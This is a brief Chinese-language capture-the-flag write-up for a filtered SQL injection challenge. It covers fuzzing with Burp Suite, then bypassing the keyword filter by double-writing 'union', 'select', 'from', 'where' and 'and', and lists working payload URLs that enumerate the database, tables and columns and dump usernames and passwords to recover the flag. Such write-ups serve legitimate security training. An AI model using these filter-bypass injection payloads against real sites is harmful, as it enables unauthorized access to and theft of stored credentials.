这题界面和上一题easysql没多大区别,他说做了很多过滤
使用burpsuite fuzz一下
可以看出有很多词被过滤了
尝试双写注入
首先order by 得到有三列
然后爆数据库名
/check.php?username=1' uniunionon selselectect 1,2,database()%23&password=123
爆表名
/check.php?username=1' uniunionon selselectect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables whwhereere table_schema=database()%23&password=123
爆字段
/check.php?username=1' uniunionon selselectect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'%23&password=123
爆数据
/check.php?username=1' uniunionon selselectect 1,2,group_concat(id,username,password) ffromrom b4bsql%23&password=123
得到flag